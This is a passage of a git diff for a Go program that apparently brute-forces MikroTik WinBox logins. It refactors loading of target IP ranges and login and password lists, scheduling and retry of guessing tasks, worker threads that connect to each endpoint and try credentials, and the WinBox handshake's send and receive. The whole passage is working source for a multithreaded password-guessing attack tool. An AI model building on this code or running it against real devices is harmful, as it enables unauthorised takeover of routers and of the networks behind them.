func(item string) (string, error) // optional transformation function + + fetchMutex sync.Mutex // sync mutex +} + +// String converts a Source to its string representation. +func (src *Source) String() string { + return src.name +} + +// FetchFromSlice retrieves an item from a string slice and optionally increments its current position. +func (src *Source) FetchFromSlice(name string, idx *int, slice []string, inc bool) (res string, empty bool) { + if *idx == -1 { // exhausted + log("src", 5, "fetch %v from %v: idx is -1, return empty", src, name) + return "", true } - if src.name == "password" && getParamSwitch("add-empty-password") { - src.plain = append(src.plain, "") + if *idx >= len(slice) { + log("src", 5, "fetch %v from %v: idx >= slice length (%v >= %v), marking as exhausted, return empty", src, name, *idx, len(slice)) + *idx = -1 + return "", true } - src.ParsePlain() + res = slice[*idx] + log("src", 5, "fetch %v from %v: ok, got %v at idx %v", src, name, res, *idx) - src.OpenFiles() - defer src.CloseSource() + if inc { + *idx = *idx + 1 + log("src", 5, "fetch %v from %v: incrementing idx to %v", src, name, *idx) + } - src.ParseFiles() - src.FailIfEmpty() + return res, false } -// CloseSource closes all files for a Source. -func (src *Source) CloseSource() { - l := len(src.files) - for _, file := range src.files { - if file != nil { - file.Close() +// FetchOne retrieves an item from a Source with a specified SourcePos. +func (src *Source) FetchOne(pos *SourcePos, inc bool) (res string, empty bool) { + src.fetchMutex.Lock() + defer src.fetchMutex.Unlock() + + if getParamSwitch("file-contents-first") { + res, empty = src.FetchFromSlice("contents", &pos.contentIdx, src.contents, inc) + if empty { + res, empty = src.FetchFromSlice("plain", &pos.plainIdx, src.plain, inc) + } + } else { + res, empty = src.FetchFromSlice("plain", &pos.plainIdx, src.plain, inc) + if empty { + res, empty = src.FetchFromSlice("contents", &pos.contentIdx, src.contents, inc) } } - src.files = nil - src.fileNames = nil - log("src", 1, "closed all %v %v files", l, src) + logIf(empty, "src", 2, "exhausted source %v for pos %v", src, pos.String()) + return res, empty } // --- // --- // --- -// LoadSources loads contents for all sources, both from commandline and from files. -func LoadSources() { - log("src", 1, "loading sources") - - var wg sync.WaitGroup - wg.Add(3) - go SrcIP.LoadSource(&wg) - go SrcLogin.LoadSource(&wg) - go SrcPassword.LoadSource(&wg) - wg.Wait() - - SrcIP.ReportLoaded() - SrcLogin.ReportLoaded() - SrcPassword.ReportLoaded() - - ParseEndpoints(SrcIP.plain) - ParseEndpoints(SrcIP.contents) - - log("src", 1, "ok: finished loading sources") +// both -1: exhausted +// both 0: not started yet +type SourcePos struct { + plainIdx int + contentIdx int } -// CloseSources closes all source files. -func CloseSources() { - log("src", 1, "closing sources") - - SrcIP.CloseSource() - SrcLogin.CloseSource() - SrcPassword.CloseSource() - - log("src", 1, "ok: finished closing sources") +// String converts a SourcePos to its string representation. +func (pos *SourcePos) String() string { + return "P" + strconv.Itoa(pos.plainIdx) + "/C" + strconv.Itoa(pos.contentIdx) } -func init() { - registerParam("ip", []string{}, "IPs or subnets in CIDR notation") - registerParam("ip-file", []string{}, "paths to files with IPs or subnets in CIDR notation (one entry per line)") - registerParam("login", []string{}, "one or more logins") - registerParam("login-file", []string{}, "paths to files with logins (one entry per line)") - registerParam("password", []string{}, "one or more passwords") - registerParam("password-file", []string{}, "paths to files with passwords (one entry per line)") +// Exhausted checks if a SourcePos can no longer produce any sources. +func (pos *SourcePos) Exhausted() bool { + return pos.plainIdx == -1 && pos.contentIdx == -1 +} - registerSwitch("add-empty-password", "insert an empty password to the password list") - registerSwitch("no-password-trim", "preserve leading and trailing spaces in passwords") - registerSwitch("logins-first", "increment logins before passwords") - registerSwitch("file-contents-first", "try to go through source files first, defer commandline args for later") +// Reset moves a SourcePos to its starting position. +func (pos *SourcePos) Reset() { + pos.plainIdx = 0 + pos.contentIdx = 0 + log("src", 3, "resetting source pos") } diff --git a/task.go b/task.go index 747f298..a5a5993 100644 --- a/task.go +++ b/task.go @@ -1,13 +1,22 @@ package main import ( - rbt "github.com/emirpasic/gods/trees/redblacktree" - rbtUtils "github.com/emirpasic/gods/utils" - "net" + "container/list" "sync" "time" ) +// deferredTasks is a list of tasks that were deferred for processing to a later time. +// This usually happens due to connection errors, protocol errors or per-endpoint limits. +var deferredTasks *list.List + +// taskMutex is a mutex for safe handling of deferred task list. +var taskMutex sync.Mutex + +func init() { + deferredTasks = list.New() +} + // TaskEvent represents all events that can be issued on a Task. type TaskEvent int @@ -51,27 +60,14 @@ func (ev TaskEvent) String() string { // A Task represents a single unit of workload. // Every Task is linked to an Endpoint. type Task struct { - e *Endpoint - login, password string - deferUntil time.Time - numDeferrals int - - // this should not be in Task struct! - conn net.Conn - // ??? do we even need this here - good bool + e *Endpoint + login string + password string + deferUntil time.Time + numDeferrals int + listElement *list.Element // position in list } -// maxSafeThreads is a safeguard to prevent creation of too many threads at once. -const maxSafeThreads = 5000 - -// deferredTasks is a list of tasks that were deferred for processing to a later time. -// This usually happens due to connection errors, protocol errors or per-endpoint limits. -var deferredTasks *rbt.Tree - -// taskMutex is a mutex for safe handling of RB tree. -var taskMutex sync.Mutex - // String returns a string representation of a Task. func (task *Task) String() string { if task == nil { @@ -86,12 +82,7 @@ func (task *Task) Defer(addTime time.Duration) { task.deferUntil = time.Now().Add(addTime) task.numDeferrals++ - // tell the endpoint that we got deferred, - // so it won't be selected until the deferral time has passed - // task.e.SetDeferralTime(task.deferUntil) - // FIXME: this isn't needed, endpoints can handle their own delays - - maxDeferrals := CfgGetInt("task-max-deferrals") + maxDeferrals := getParamInt("task-max-deferrals") if maxDeferrals != -1 && task.numDeferrals >= maxDeferrals { log("task", 5, "giving up on task \"%v\" because it has exhausted its deferral limit (%v)", task, maxDeferrals) return @@ -102,7 +93,9 @@ func (task *Task) Defer(addTime time.Duration) { taskMutex.Lock() defer taskMutex.Unlock() - deferredTasks.Put(task.deferUntil, task) + if task.listElement == nil { + task.listElement = deferredTasks.PushBack(task) + } } // EventWithParm tells a Task (and its underlying Endpoint) that @@ -115,21 +108,21 @@ func (task *Task) EventWithParm(event TaskEvent, parm any) bool { return true // do not process generic events } - res := task.e.EventWithParm(event, parm) // notify the endpoint first + endpointOk := task.e.EventWithParm(event, parm) // notify the endpoint first switch event { // on these events, defer a Task only if its Endpoint is being kept case TE_NoResponse: - if res { - task.Defer(CfgGetDurationMS("no-response-delay-ms")) + if endpointOk { + task.Defer(getParamDurationMS("no-response-delay-ms")) } case TE_ReadFailed: - if res { - task.Defer(CfgGetDurationMS("read-error-delay-ms")) + if endpointOk { + task.Defer(getParamDurationMS("read-error-delay-ms")) } case TE_ProtocolError: - if res { - task.Defer(CfgGetDurationMS("protocol-error-delay-ms")) + if endpointOk { + task.Defer(getParamDurationMS("protocol-error-delay-ms")) } // report about a bad/good auth result @@ -144,7 +137,7 @@ func (task *Task) EventWithParm(event TaskEvent, parm any) bool { time.Sleep(parm.(time.Duration)) } - return res + return endpointOk } // Event is a parameterless version of EventWithParm. @@ -156,42 +149,26 @@ func (task *Task) Event(event TaskEvent) bool { func GetDeferredTask() (task *Task, waitTime time.Duration) { currentTime := time.Now() - if deferredTasks.Empty() { + if deferredTasks.Len() == 0 { log("task", 5, "deferred task list is empty") return nil, 0 } - // check if a deferred task's endpoint is OK to fetch - - // sometimes, a task is OK to fetch but the endpoint was delayed by something else - - it := deferredTasks.IteratorAt(deferredTasks.Left()) - for { - k, v := it.Key().(time.Time), it.Value().(*Task) + minWaitTime := time.Time{} - if k.After(currentTime) { - log("task", 5, "deferred tasks cannot yet be processed at this time") - return nil, k.Sub(currentTime) + for e := deferredTasks.Front(); e != nil; e = e.Next() { + dt := e.Value.(*Task) + if minWaitTime.IsZero() || (dt.deferUntil.Before(minWaitTime) && dt.deferUntil.After(currentTime)) { + minWaitTime = dt.deferUntil } - if k.Before(v.deferUntil) { - log("task", 5, "deferred task was re-deferred: removing its previous definition") - defer deferredTasks.Remove(k) - it.Next() - continue + if dt.deferUntil.Before(currentTime) && (dt.e.delayUntil.IsZero() || dt.e.delayUntil.Before(currentTime)) { + deferredTasks.Remove(e) + return dt, 0 } - - if !v.e.delayUntil.IsZero() && v.e.delayUntil.After(currentTime) { - // skip this task: deferred task is OK, but its endpoint is delayed - it.Next() - continue - } - - defer deferredTasks.Remove(k) - return v, 0 } - log("task", 5, "deferred tasks are OK for processing but their endpoints cannot yet be processed at this time") - return nil, 0 + return nil, minWaitTime.Sub(currentTime) } // FetchTaskComponents returns all components needed to build a Task. @@ -240,46 +217,25 @@ func CreateTask() (task *Task, delay time.Duration) { task, delayDeferred := GetDeferredTask() if task != nil { log("task", 4, "new task (deferred): %v", task) - task.conn = nil - task.good = false return task, 0 } - ep, login, password, delaySource := FetchTaskComponents() + ep, login, password, delayEndpoint := FetchTaskComponents() if ep == nil { - if delayDeferred == 0 && delaySource == 0 { + if delayDeferred == 0 && delayEndpoint == 0 { log("task", 4, "cannot build task, no endpoint") return nil, 0 - } else if delayDeferred > delaySource || delayDeferred == 0 { - log("task", 4, "delaying task creation (by source delay) for %v", delaySource) - return nil, delaySource + } else if delayDeferred > delayEndpoint || delayDeferred == 0 { + log("task", 4, "delaying task creation (by endpoint delay) for %v", delayEndpoint) + return nil, delayEndpoint } else { log("task", 4, "delaying task creation (by deferred delay) for %v", delayDeferred) return nil, delayDeferred } } - t := Task{} - t.e = ep - t.login = login - t.password = password - t.good = false - + t := Task{e: ep, login: login, password: password} log("task", 4, "new task: %v", &t) return &t, 0 } - -func init() { - deferredTasks = rbt.NewWith(rbtUtils.TimeComparator) - - CfgRegister("threads", 3, "how many threads to use") - CfgRegister("thread-delay-ms", 10, "separate threads at startup for this amount of ms") - CfgRegister("connect-timeout-ms", 3000, "") - CfgRegister("read-timeout-ms", 2000, "") - - // using a very high limit for now, but this should actually be set to -1 - CfgRegister("task-max-deferrals", 30000, "how many deferrals are allowed for a single task. -1 to disable") - - CfgRegisterAlias("t", "threads") -} diff --git a/thread.go b/thread.go index f113efa..df04f27 100644 --- a/thread.go +++ b/thread.go @@ -1,112 +1,90 @@ package main +// thread.go: handling of worker threads + import ( - "net" "sync" "time" ) -// threadWork processes a single work item for a thread. -func threadWork(dialer *net.Dialer) bool { - readTimeout := CfgGetDurationMS("read-timeout-ms") +// maxSafeThreads is a safeguard to prevent creation of too many threads at once. +const maxSafeThreads = 5000 + +// ThreadService creates, starts up and waits for all threads. +func ThreadService() { + numThreads := getParamInt("threads") + failIf(numThreads > maxSafeThreads, "too many threads (max %v)", maxSafeThreads) + + log("thread", 0, "initializing %v threads", numThreads) + + c := make(chan bool) + var wg sync.WaitGroup + for i := 1; i <= numThreads; i++ { + wg.Add(1) + go threadEntryPoint(c, i, &wg) + } + + threadDelay := getParamDurationMS("thread-delay-ms") + log("thread", 0, "starting %v threads", numThreads) + for i := 1; i <= numThreads; i++ { + c <- true + if threadDelay > 0 { + time.Sleep(threadDelay) + } + } + log("thread", 1, "waiting for threads") + wg.Wait() + log("thread", 1, "finished waiting for threads") +} + +// threadEntryPoint is the main entrypoint for a work thread. +func threadEntryPoint(c chan bool, threadIdx int, wg *sync.WaitGroup) { + <-c + + log("thread", 3, "starting loop for thread %v", threadIdx) + + for threadWork() { + } + + log("thread", 3, "exiting thread %v", threadIdx) + wg.Done() +} + +// threadWork processes a single work item for a thread. +func threadWork() bool { task, delay := CreateTask() if task == nil { if delay > 0 { - log("thread", 3, "no endpoints available, sleeping for %v", delay) + log("thread", 3, "no active endpoints available, sleeping for %v", delay) time.Sleep(delay) return true } else { - log("thread", 3, "no endpoints available, stopping thread loop") + log("thread", 3, "no endpoints available (active and deferred), stopping thread loop") return false } } - conn, err := dialer.Dial("tcp", task.e.String()) + conn, err := NewConnection(task.e) if err != nil { - task.Event(TE_NoResponse) - log("thread", 2, "cannot connect to \"%v\": %v", task.e, err.Error()) + task.EventWithParm(TE_NoResponse, err) return true } - defer conn.Close() - task.conn = conn task.Event(TN_Connected) - conn.SetReadDeadline(time.Now().Add(readTimeout)) // should be just before Send() call... + log("thread", 2, "trying %v", task) - log("thread", 2, "trying %v:%v on \"%v\"", task.login, task.password, task.e) - - // TODO: multiple services (currently just WinBox) res, err := TryLogin(task, conn) if err != nil { task.Event(TE_ProtocolError) } else { if res && err == nil { - task.EventWithParm(TE_Good, task.login) + task.Event(TE_Good) } else { - task.EventWithParm(TE_Bad, task.login) + task.Event(TE_Bad) } } return true } - -// threadLoop calls threadWork in a loop, until the endpoints are exhausted, -// a pause/stop signal has been raised, or an exception has occurred in threadWork. -func threadLoop(dialer *net.Dialer) { - for threadWork(dialer) { - // TODO: pause/stop signal - // TODO: exception handling - } -} - -// threadEntryPoint is the main entrypoint for a work thread. -func threadEntryPoint(c chan bool, threadIdx int, wg *sync.WaitGroup) { - <-c - - log("thread", 3, "starting loop for thread %v", threadIdx) - - connectTimeout := time.Duration(CfgGetInt("connect-timeout-ms")) * time.Millisecond - dialer := net.Dialer{Timeout: connectTimeout, KeepAlive: -1} - - threadLoop(&dialer) - - log("thread", 3, "exiting thread %v", threadIdx) - wg.Done() -} - -// InitializeThreads creates and starts up all threads. -func InitializeThreads() *sync.WaitGroup { - numThreads := CfgGetInt("threads") - failIf(numThreads > maxSafeThreads, "too many threads (max %v)", maxSafeThreads) - - log("thread", 0, "initializing %v threads", numThreads) - - c := make(chan bool) - var wg sync.WaitGroup - for i := 1; i <= numThreads; i++ { - wg.Add(1) - go threadEntryPoint(c, i, &wg) - } - - threadDelay := CfgGetDurationMS("thread-delay-ms") - log("thread", 0, "starting %v threads", numThreads) - for i := 1; i <= numThreads; i++ { - c <- true - if threadDelay > 0 { - time.Sleep(threadDelay) - } - } - - log("thread", 0, "started") - return &wg -} - -// WaitForThreads enters a wait state and keeps it until -// all threads have exited. -func WaitForThreads(wg *sync.WaitGroup) { - log("thread", 1, "waiting for threads") - wg.Wait() - log("thread", 1, "finished waiting for threads") -} diff --git a/winbox.go b/winbox.go index 26b9c43..3e72365 100644 --- a/winbox.go +++ b/winbox.go @@ -3,21 +3,21 @@ package main import ( "bytes" "errors" - "net" ) type Winbox struct { task *Task - conn net.Conn + conn *Connection stage int - user, pass string - w *WCurve - sa, xwa, xwb, j, z, secret, clientCC, serverCC, i, msg, resp []byte - xwaParity, xwbParity bool + user, pass string + w *WCurve + sa, xwa, xwb, j, z, secret, i []byte + clientCC, serverCC, msg, resp []byte + xwaParity, xwbParity bool } -func NewWinbox(task *Task, conn net.Conn) *Winbox { +func NewWinbox(task *Task, conn *Connection) *Winbox { winbox := Winbox{} winbox.task = task winbox.conn = conn @@ -138,7 +138,7 @@ func (winbox *Winbox) confirmation() error { func (winbox *Winbox) sendAndRecv() error { if len(winbox.msg) > 0 && winbox.conn != nil { - _, err := winbox.conn.Write(winbox.msg) + err := winbox.conn.Send(winbox.msg) winbox.msg = []byte{} if err != nil { @@ -146,14 +146,11 @@ func (winbox *Winbox) sendAndRecv() error { return err } - winbox.resp = make([]byte, 1024) - n, err := winbox.conn.Read(winbox.resp) + winbox.resp, err = winbox.conn.Recv() if err != nil { log("winbox", 1, "failed to recv: %v", err.Error()) return err } - - winbox.resp = winbox.resp[:n] } return nil